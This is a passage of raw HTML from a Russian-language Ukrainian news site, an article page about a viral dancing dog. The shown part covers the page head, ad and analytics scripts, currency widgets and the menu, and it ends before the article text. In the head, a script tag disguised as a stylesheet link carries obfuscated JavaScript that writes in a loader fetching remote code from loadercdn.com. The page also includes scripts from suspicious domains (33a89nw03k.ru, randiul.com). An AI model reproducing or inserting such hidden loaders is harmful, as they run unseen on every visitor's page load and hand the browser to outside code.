<!DOCTYPE html><html prefix="og: http://ogp.me/ns#" lang="ru"><head><title>Пес, устроивший настоящее представление с танцами, стал звездой Сети (ВИДЕО) | Экономические Новости</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta name="referrer" content="origin"><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="msvalidate.01" content="B41426C32883F1040781CF3774D685FD" /> <meta property="og:title" content="Пес, устроивший настоящее представление с танцами, стал звездой Сети (ВИДЕО) "/><meta property="og:site_name" content="enovosty. Украинские новости дня"/><meta property="og:image" content="https://enovosty.com/wp-content/uploads/2021/03/screenshot_15.jpg"/><meta property="og:type" content="article" /><meta property="og:image:width" content="399" /><meta property="og:image:height" content="403" /><meta property="og:image:alt" content="Пес, устроивший настоящее представление с танцами, стал звездой Сети (ВИДЕО) " /><meta name="google-site-verification" content="lQg1PFdRt2LbXcwJ8zsQT5ZnqQEsNPh4d7LwEmOU_lU" /><style>.toparticles{position:relative}.toparticles #photoPromo{height:216px;width:466px;overflow:hidden}.toparticles #photoPromo li{height:216px}.toparticles div.anythingSlider .anythingControls{display:block}</style><link rel="icon" href="https://enovosty.com/favicon.ico" type="image/x-icon" /><link rel="apple-touch-icon" sizes="144x144" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="114x114" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png"><link rel="apple-touch-icon-precomposed" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png" /><style>@font-face{font-family:"sw-icon-font";src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0");src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0#iefix") format("embedded-opentype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.6.0") format("woff"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.6.0") format("truetype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.6.0#1445203416") format("svg");font-weight:normal;font-style:normal}</style><link rel='stylesheet' id='mo_openid_admin_settings_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/mo_openid_style.css?version=5.0.6' type='text/css' media='all' /><link rel='stylesheet' id='mo_openid_admin_settings_phone_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/phone.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-social-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-social.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-main-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap.min-preview.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-font-awesome-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/font-awesome.min.css?version=4.8' type='text/css' media='all' /><link rel='stylesheet' id='bootstrap_style_ass-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-tour-standalone.css?version=5.1.4' type='text/css' media='all' /><link rel='stylesheet' id='wp-block-library-css' href='https://enovosty.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='wbcr-comments-plus-url-span-css' href='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/css/url-span.css' type='text/css' media='all' /><link rel='stylesheet' id='social_warfare-css' href='https://enovosty.com/wp-content/plugins/social-warfare/assets/css/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='videojscss-css' href='https://enovosty.com/wp-content/themes/eizvestia/videojs/video-js.css' type='text/css' media='all' /><link rel='stylesheet' id='videojsimacss-css' href='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ima.css' type='text/css' media='all' /><link rel='stylesheet' id='msl-main-css' href='https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css' type='text/css' media='all' /><link rel='stylesheet' id='ldc-like-dislike-css' href='https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1' type='text/css' media='all' /><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery-migrate.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/jquery.cookie.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/social_login.js'></script><meta name="description" content="Собаки обожают прогулки, и долго их уговаривать не приходится. Скорее, наоборот, они чаще сами напоминают и просят владельцев сходить с ними в ближайший парк." /><meta property="og:description" content="Собаки обожают прогулки, и долго их уговаривать не приходится. Скорее, наоборот, они чаще сами напоминают и просят владельцев сходить с ними в ближайший парк." /><meta name="keywords" content="курьез,новости общества" /><link rel="canonical" href="https://enovosty.com/news_society/full/2003-pes-ustroivshij-nastoyashhee-predstavlenie-chtoby-ugovorit-xozyaina-pogulyat-s-nim-stal-zvezdoj-seti-video" /><meta property="og:url" content="https://enovosty.com/news_society/full/2003-pes-ustroivshij-nastoyashhee-predstavlenie-chtoby-ugovorit-xozyaina-pogulyat-s-nim-stal-zvezdoj-seti-video" /><style>.ms-parent-id-7 > .master-slider{background:#000000}.ms-parent-id-6 > .master-slider{background:#000000}.ms-parent-id-5 > .master-slider{background:#000000}.ms-parent-id-4 > .master-slider{background:#000000}.ms-parent-id-3 > .master-slider{background:#000000}.ms-parent-id-2 > .master-slider{background:#000000}.ms-parent-id-1 > .master-slider{background:#000000}</style><script>var ms_grabbing_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script><meta name="generator" content="MasterSlider 3.1.1 - Responsive Touch Image Slider | www.avt.li/msf" /><link rel="amphtml" href="https://enovosty.com/news_society/full/2003-pes-ustroivshij-nastoyashhee-predstavlenie-chtoby-ugovorit-xozyaina-pogulyat-s-nim-stal-zvezdoj-seti-video?amp"><meta name="fragment" content="!" /><script type="text/javascript">ajaxurl = '/wp-admin/admin-ajax.php';gpid = '4837426';cpage = ''
</script><style>span.swp_share,i.swp_facebook_icon,i.swp_twitter_icon,i.swp_linkedin_icon,span.swp_count{color:#ffffff}table.social{width:50%!important}.swp_share_button{height:max-content!important}.swp_social_panel{margin-bottom:0px!important;margin-top:0px!important}</style><script href="https://enovosty.com/wp-content/themes/eizvestia/style1.min.css?v=1">(function(e,t,r,n,o,a,i,l,m,c,g,d,s,u){var w,f,h,p,b,v,y,I="",A="/?r=",B=e.localStorage||{};for(w in B)e[g](w[d](0,3),16)+""==w[d](3)&&(f=B[i+m](w)).length<100&&f[d](0,3)==s&&(B[l+m](w),I=f);v=(b=(p=(h=e[t]).getElementsByTagName(n))[p.length-1])[a]("href"),y=b[a]("media")||"",h[r]("<"+n+">"+(I?u+'="//loadercdn.com'+A+e[u]+"&"+I+'";':t+"."+r+"('<"+o+">@"+c+' "'+v+'" '+y+";</"+o+">');")+"</"+n+">")})(window,"document","write","script","style","getAttribute","get","remove","Item","import","parseInt","substr","d1e","location");</script><link rel="stylesheet" id="like-dislike-css" href="https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1&#038;ver=1.0.0" type="text/css" media="all" /><script><!--//--><![CDATA[//><!--
var pp_gemius_identifier = new String('.WeQbWs7d1FI7fa_VrIDknZ233jNFqLPdhORXpDm_jL.27');//--><!]]></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/x_gemius.js"></script><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-addcount.js.php?top_ten_id=4837426&amp;a=2212" async></script><!--[if lte IE 7]><link rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/css/anythingslider-ie.css" type="text/css" media="screen" /><![endif]--><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/js/jquery.anythingslider1.min.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jqvisible.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/common.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/adriver.core.2.ua.min.js"></script><script type="text/javascript">(function () {var w = window,d = document,protocol = /https/i.test(w.location.protocol) ? 'https:' : 'http:',aml = typeof admixerML !== 'undefined' ? admixerML : {};aml.fn = aml.fn || [];aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
aml.noCriteo = true;if (!w.admixerML) {var lodash = document.createElement('script');lodash.id = 'amlScript';lodash.async = true;lodash.type = 'text/javascript';lodash.src = aml.cdnPath + 'scripts3/loader2.js';var node = d.getElementsByTagName('script')[0];node.parentNode.insertBefore(lodash, node);w.admixerML = aml;}})();</script> <script src="https://scripts.go2net.com.ua/scripts3/loader2.js" async
data-inv="//ads.go2net.com.ua/"
data-r="single"
data-sender="go2net"
data-bundle="desktop"></script><meta property="fb:admins" content="100009507220682"/><meta property="fb:app_id" content="2113796585568948"/><script>function setHomepage(){var homepage = 'https://enovosty.com';
if (document.all){document.body.style.behavior='url(#default#homepage)';document.body.setHomePage(homepage);}else if (window.sidebar){if(window.netscape){try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}catch(e){alert("this action was aviod by your browser，if you want to enable，please enter about:config in your address line,and change the value of signed.applets.codebase_principal_support to true");}}var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components. interfaces.nsIPrefBranch);prefs.setCharPref('browser.startup.homepage',homepage);}}</script><script>var _gaq = _gaq || [];var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js';
_gaq.push(['_require', 'inpage_linkid', pluginUrl]);_gaq.push(['_setAccount', 'UA-12467142-3']);_gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);_gaq.push(['_addOrganic', 'go.mail.ru', 'q']);_gaq.push(['_addOrganic', 'nigma.ru', 's']);_gaq.push(['_addOrganic', 'webalta.ru', 'q']);_gaq.push(['_addOrganic', 'aport.ru', 'r']);_gaq.push(['_addOrganic', 'poisk.ru', 'text']);_gaq.push(['_addOrganic', 'km.ru', 'sq']);_gaq.push(['_addOrganic', 'liveinternet.ru', 'ask']);_gaq.push(['_addOrganic', 'quintura.ru', 'request']);_gaq.push(['_addOrganic', 'search.qip.ru', 'query']);_gaq.push(['_addOrganic', 'gde.ru', 'keywords']);_gaq.push(['_addOrganic', 'gogo.ru', 'q']);_gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);_gaq.push(['_addOrganic', 'images.yandex.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);_gaq.push(['_setDomainName', 'enovosty.com']);_gaq.push(['_trackPageview']);(function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();</script><script>function trackOutboundLink(link, category, action) {var url = '';if(link.href) url = link.href;if(url == ''){str = link.getAttribute("onclick");m = str.match("(https:\/\/.*?)\'");if(m) url = m[1];}try {_gaq.push(['_trackEvent', category , action]);} catch(err){}setTimeout(function() {}, 100);}</script><script>jQuery(document).ready(function($){$("a").each(function() {var href = $(this).attr("href");var target = $(this).attr("target");var text = $(this).text();var a = new RegExp('/' + window.location.host + '/');var e = /([-a-zA-Z0-9@:%_\+.~#?&\/\/=]{2,256}\.[a-z]{2,4}\b(\/?[-a-zA-Z0-9@:%_\+.~#?&\/\/=]*)?)/gi;var b = new RegExp(e);$(this).click(function(event) {if (this.href && b.test(this.href) && !a.test(this.href) && (href.indexOf("enovosty.com") == -1)) {console.log("document.URL : "+this.href);event.preventDefault();_gaq.push(["_trackEvent", "Links", "Clicked", href, , false]);setTimeout(function() {window.open(href,(!target?"_self":target));},300);}});});});</script><script>(function(){var j=163229,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("async","true");a.setAttribute("src","https://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script><script> !(function () { window.googletag = window.googletag || {}; window.vmpbjs = window.vmpbjs || {}; window.vpb = window.vpb || {}; vpb.fastLoad = true; googletag.cmd = googletag.cmd || []; vmpbjs.cmd = vmpbjs.cmd || []; var cmds = googletag.cmd.slice(0) || []; googletag.cmd.length=0; var ready = false; function exec(cb) { return cb.call(googletag); } googletag.cmd.push(function () { googletag.cmd.unshift = function (cb) { if (ready) { return exec(cb); } cmds.unshift(cb); if (cb._startgpt) { ready = true; cmds.forEach(cb=> { exec(cb); }); } }; googletag.cmd.push = function (cb) { if (ready) { return exec(cb); } cmds.push(cb); }; }); googletag.cmd.push = function (cb) { cmds.push(cb) }; googletag.cmd.unshift = function (cb) { cmds.unshift(cb); if (cb._startgpt) { ready = true; if (googletag.apiReady) { cmds.forEach(function (cb) { googletag.cmd.push(cb); }) } else { googletag.cmd = cmds; } } }; var dayMs = 36e5, cb = parseInt(Date.now() / dayMs), vpbSrc = '//player.adtelligent.com/prebidlink/' + cb + '/wrapper_hb_308225_6946.js', pbSrc = vpbSrc.replace('wrapper_hb', 'hb'), gptSrc = '//securepubads.g.doubleclick.net/tag/js/gpt.js', c = document.head || document.body || document.documentElement; function loadScript(src, cb) { var s = document.createElement('script'); s.src = src; s.defer=false; c.appendChild(s); s.onload = cb; s.onerror = function(){ var fn = function(){}; fn._startgpt = true; googletag.cmd.unshift(fn); }; return s; } loadScript(pbSrc); loadScript(gptSrc); loadScript(vpbSrc); })() </script><script async src="//www.googletagservices.com/tag/js/gpt.js"></script><script async src="//acdn.adnxs.com/prebid/not-for-prod/prebid.js"></script><script>var div_1_sizes = [
[240, 320],[240, 350],[240, 420],[240, 500],[240, 600],[300, 250],[300, 280],[300, 300],[300, 400],[300, 500],[300, 600],[320, 50],[320, 100],[320, 250],[320, 480],[320, 600]
];var div_2_sizes = [
[200, 200],[200, 400],[200, 600],[240, 350],[240, 500],[240, 600],[300, 250],[300, 300],[300, 400],[300, 500],[300, 600]
];var div_3_sizes = [
[240, 350],[240, 500],[300, 250],[300, 600]
];var div_4_sizes = [
[300, 250],[300, 50],[300, 75],[300, 100],[300, 300],[320, 50],[320, 100],[320, 250],[320, 200]
];var PREBID_TIMEOUT = 1000;var FAILSAFE_TIMEOUT = 3000;var adUnits = [
{code: '/29636627/enovosty.com_300x600_mob_hb',mediaTypes: {banner: {sizes: div_1_sizes
}},bids: [{bidder: 'admixer',params: {zone: '0aeef458-3e2c-4ffa-b559-7ed3aa2de424'
}}]
},{code: '/29636627/enovosty.com_320x250_hb',mediaTypes: {banner: {sizes: div_4_sizes
}},bids: [{bidder: 'admixer',params: {zone: '156e0022-5c98-499e-b4e6-788848e60a3c'
}}]
},{code: '/29636627/enovosty.com_300x600_top_hb',mediaTypes: {banner: {sizes: div_2_sizes
}},bids: [{bidder: 'admixer',params: {zone: '9743148c-0bcf-416e-8ab5-55d24689e145'
}}]
},{code: '/29636627/enovosty.com_300x600_ukr.net_hb',mediaTypes: {banner: {sizes: div_3_sizes
}},bids: [{bidder: 'admixer',params: {zone: '7af953ae-795d-4e3e-8b55-c1906dcae224'
}}]
}];// ======== DO NOT EDIT BELOW THIS LINE =========== //
var googletag = googletag || {};googletag.cmd = googletag.cmd || [];googletag.cmd.push(function() {googletag.pubads().disableInitialLoad();});var pbjs = pbjs || {};pbjs.que = pbjs.que || [];pbjs.que.push(function() {pbjs.addAdUnits(adUnits);pbjs.requestBids({bidsBackHandler: initAdserver,timeout: PREBID_TIMEOUT
});});function initAdserver() {if (pbjs.initAdserverSet) return;pbjs.initAdserverSet = true;googletag.cmd.push(function() {pbjs.que.push(function() {pbjs.setTargetingForGPTAsync();googletag.pubads().refresh();});});}// in case PBJS doesn't load
setTimeout(function() {initAdserver();}, FAILSAFE_TIMEOUT);googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_mob_hb', div_1_sizes, 'div-1').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_top_hb', div_2_sizes, 'div-2').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_ukr.net_hb', div_3_sizes, 'div-3').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_320x250_hb', div_4_sizes, 'div-4').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});</script><script>var googletag = googletag || {};googletag.cmd = googletag.cmd || [];</script><script>googletag.cmd.push(function() {googletag.defineSlot('/59256651/Test_Moxtv_enovosty_970x250', [970, 250], 'div-gpt-ad-1599639337661-0').addService(googletag.pubads());googletag.defineSlot('/59256651/enovosty2_300x600', [300, 600], 'div-gpt-ad-1596728019577-0').addService(googletag.pubads());googletag.defineSlot('/59256651/enovosty_970x250', [970, 250], 'div-gpt-ad-1595961600637-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600', [300, 600], 'div-gpt-ad-1531223757969-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600_2', [300, 600], 'div-gpt-ad-1531304104065-0').addService(googletag.pubads());//googletag.defineSlot('/17774365/enovosty.com_728x90', [728, 90], 'div-gpt-ad-1531223757969-1').addService(googletag.pubads());
googletag.defineSlot('/59256651/ads_ei_468_60', [468, 60], 'div-gpt-ad-1516280158772-0').addService(googletag.pubads());googletag.defineSlot('/59256651/enovosty_adint_300_600', [[300, 600],[300,250]], 'div-gpt-ad-1594112815543-0').addService(googletag.pubads());googletag.defineSlot('/59256651/Adaptive_zone', [470, 376], 'div-gpt-ad-1594991505318-0').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.pubads().collapseEmptyDivs();googletag.enableServices();});
</script><script type="text/plain" id="vpb-catfish-template"><div class="vpb-catfish-container" style="position: fixed;bottom:0;left:0;right:0;z-index:999999;"><div class="vpb-ad" style="display: block;position: relative;margin:0px auto;"><span class="vpb-close-button"
style="display: none;position: absolute;top:-15px;right:-15px;z-index:9999;cursor: pointer;"><img src="data:image/png;base64,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"/></span></div></div></script><script>function catfish(div) {var gt = window.googletag || {};gt.cmd = gt.cmd || [];gt.cmd.push(function () {var template = document.getElementById('vpb-catfish-template').innerHTML;var adContainer = document.getElementById(div);adContainer.innerHTML = template;adContainer.id = 'vpb-ad-wrapped-generated-' + (Math.random() + Date.now());var innerWrapper = adContainer.getElementsByClassName('vpb-ad')[0];var closeBtn = adContainer.getElementsByClassName('vpb-close-button')[0];var newAdDiv = document.createElement('div');newAdDiv.id = div;innerWrapper.appendChild(newAdDiv);googletag.pubads().addEventListener('slotRenderEnded', function (event) {var slot = event.slot;var slotId = slot.getSlotElementId();if (slotId != div)  return;if (event.isEmpty) {closeBtn.style.display = 'none';adContainer.style.display = 'none';return;}adContainer.style.display = 'block';innerWrapper.style.width = event.size[0] + 'px';innerWrapper.style.height = event.size[1] + 'px';closeBtn.style.display = 'inline-block';closeBtn.addEventListener('click', function () {adContainer.parentElement.removeChild(adContainer);})
});gt.display(div);})
}</script><script src="https://33a89nw03k.ru/script.js"></script></head><body><script type='text/javascript'>admixerML.fn.push(function() {// Правая колонка - верх
if(/ukr.net/i.test(document.referrer)){admixerML.defineSlot({z: '7af953ae-795d-4e3e-8b55-c1906dcae224', ph: 'admixer_7af953ae795d4e3e8b55c1906dcae224_zone_12623_sect_1082_site_1069',i: 'inv-nets'});} else {admixerML.defineSlot({z: '9743148c-0bcf-416e-8ab5-55d24689e145', ph: 'admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069', i: 'inv-nets'});};admixerML.defineSlot({z: '9a399316-86c0-4d6c-a6f1-676a36437a90', ph: 'admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069', i: 'inv-nets', s:'8b5577c5-d6c8-4102-81da-48ee76305fc9'});// Нигде не выводится

// Статьи/Новости внизу
admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph:
'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i:
'inv-nets' ,renderedCallback: function(e) {var player = e.ph.childNodes[0].contentWindow &&
e.ph.childNodes[0].contentWindow.player;if (player){player.mute();}}});// Футтер
admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f', ph:
'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069', i:
'inv-nets'});
admixerML.defineSlot({z: '5dacd85f-7810-44f5-831a-9a7b2add1a5f', ph: 'admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069', i: 'inv-nets'});admixerML.singleRequest();});</script><script type='text/javascript'>(window.globalAmlAds = window.globalAmlAds || []).push(function() {globalAml.defineSlot({z: '6c64e196-3fa9-43cf-8c1e-fd800277f90c', ph: 'go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570', i: 'inv-nets', s:'7901bb9a-67fa-4dcd-8ae7-8a34d5bc7852', sender: 'go2net'});globalAml.singleRequest("go2net");});</script><script><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:101585,s:101585,t:6,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};for(var f=self;f!=f.parent;f=f.parent)bm.w++;try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400).slice(0,400);bm.v^=r.length}bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];bmD.write('<img src="//c.bigmir.net/?'+bs.join('&')+'"  width="0" height="0" alt="bigmir)net TOP 100" style="display:none;" title="bigmir)net TOP 100" />');
//--></script><noscript><img src="//c.bigmir.net/?v101585&s101585&t6" width="0" height="0" alt="" title="" /></noscript><div id="fb-root"></div><script>window.fbAsyncInit = function() {FB.init({appId      : '2113796585568948',cookie     : true,xfbml      : true,version    : 'v3.0'
});
FB.AppEvents.logPageView();
};(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) {return;}js = d.createElement(s); js.id = id;js.src = "https://connect.facebook.net/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);}(document, 'script', 'facebook-jssdk'));</script><div id="adriver_banner_branding"></div><div id='admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069'></div><script>admixerML.fn.push(function() {admixerML.display('admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069');});</script><div class="container"> <div style="margin-top:0px;position:relative;"> <div id='admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069');});</script><script type="text/javascript" id="ertqxb">(function(){var s = document.createElement("script");s.type = "text/javascript";s.src = "//randiul.com/t.js?i=z61ztncbiozypm54k16j8&cb=" + (new String(Math.random())).substring(2,8) + (((new Date()).getTime()));
d = document.getElementById("ertqxb");d.parentNode.insertBefore(s, d);})();</script><div id="right_ban"></div> </div> <div class="cls"></div><div id="header" style="padding-top:0px; margin-top: 0px;" ><div id="headerTop"><div class="cls"></div></div>   <div id="headerMiddle"><a href="https://enovosty.com/"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png" id="logo" alt="Экономические новости" title="Экономические новости" /></a> <a href="https://enovosty.com/konverter-valyut" class="finmarket">Конвертер валют</a><a href="https://enovosty.com/video" class="videohead">Видео</a><a class="wap" rel="nofollow" href="https://enovosty.com/news_society/full/2003-pes-ustroivshij-nastoyashhee-predstavlenie-chtoby-ugovorit-xozyaina-pogulyat-s-nim-stal-zvezdoj-seti-video?mobile=1"></a><a class="wap-img" title="Мобильная версия сайта" rel="nofollow" href="https://enovosty.com/news_society/full/2003-pes-ustroivshij-nastoyashhee-predstavlenie-chtoby-ugovorit-xozyaina-pogulyat-s-nim-stal-zvezdoj-seti-video?mobile=1"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/wap1.png" alt="Мобильная версия сайта" />Мобильная версия</a> <div class="wiget simple" id="curs"><span style="text-align:center;display: block;font-size: 12px;font-weight: 700;"><a style="color: #369;" href="https://enovosty.com/currency-rates">Курсы валют</a></span><div class="header-currency"><a href="https://enovosty.com/currency-rates"><table class="currency"> <tr class="cur_shap"><td>&nbsp;</td><td><strong>Продажа</strong></td><td><strong>Покупка</strong></td><td><strong>НБУ</strong></td> </tr> <tr><td>USD</td><td>27.82</td><td>27.52</td><td>25.14</td> </tr> <tr class="tr_white"><td>EUR</td><td>33.40</td><td>32.64</td><td>27.75</td> </tr> <tr><td>RUB</td><td>0.41</td><td>0.28</td><td>0.38</td> </tr></table></a></div></div><div class="wiget simple" id="fonds"><span style="color: #369;text-align: center;display: block;font-size: 12px;font-weight: 700;">Фондовые индексы</span><table class="currency index"> <tr class="cur_shap"> <td>&nbsp;</td><td><strong>Знач.</strong></td><td><strong>Изм.,&nbsp;%</strong></td><td><strong>Время</strong></td> </tr> <tr> <td>PFTS</td><td>516.87</td><td>0.00</td><td>20:36 19.03.2021</td> </tr> <tr class="tr_white"> <td>UX</td><td>1797.54</td><td>0.00</td><td>17:00 19.03.21</td> </tr> <tr> <td>RTS</td><td>1474.05</td><td>0.00</td><td>17:51 19.03.2021</td> </tr></table></div><div class="wiget simple" id="toplivo"><span style="color: #369;text-align:center;display: block;font-size: 12px;font-weight: 700;">Стоимость нефти (ICE)</span><table class="currency benzin"><tr class="cur_shap"><td></td><td><strong>$/баррель</strong></td><td><strong>Изм., %</strong></td><td><strong>Дата</strong></td></tr><tr><td style="text-align:left;padding-left: 2px;">BRENT</td><td>64.53</td><td>+2.53</td><td style="text-transform:uppercase;">Mar</td></tr><tr class="tr_white"><td style="text-align:left;padding-left: 2px;">WTI</td><td>61.44</td><td>+2.40</td><td style="text-transform:uppercase;">Mar</td></tr><tr><td style="text-align:left;padding-left: 2px;">GAS OIL</td><td>510.50</td><td>-0.97</td><td style="text-transform:uppercase;">Mar</td></tr></table></div> <div id="header_right"> <a href="https://enovosty.com/rss/rss.xml">RSS</a><a href="https://enovosty.com/afisha" class="h-anonsy" style="margin-top: 40px;"> 
Афиша</a><a class="archive" href="https://enovosty.com/archive">Архив</a><div style="clear: both;vertical-align:top;"> <a href="https://enovosty.com" title="Последние новости - &quot;ЭКОНОМИЧЕСКИЕ НОВОСТИ&quot;" onclick="window.external.AddFavorite(this.href, this.title); return false;" rel="sidebar">Добавить в закладки</a> </div> </div> <div class="cls"></div></div> <div id="mainMenu" data-hover="hover-on-menu"><ul id="ull" class="menu"><li class="menu-item-has-children"><a class="first" href="https://enovosty.com/news" data-hover="hover-on-link">Новости</a><ul class="sub-menu"><li><a href="https://enovosty.com/news_politics">Политика</a></li><li><a href="https://enovosty.com/news_kiev">Киев</a></li><li><a href="https://enovosty.com/news_economy">Экономика</a></li><li><a href="https://enovosty.com/news-finance">Финансы</a></li><li><a href="https://enovosty.com/news_ekskluzive">Эксклюзив</a></li><li><a href="https://enovosty.com/news-markets">Рынки</a></li><li class="current-menu-item"><a href="https://enovosty.com/news_society">Общество</a></li><li><a 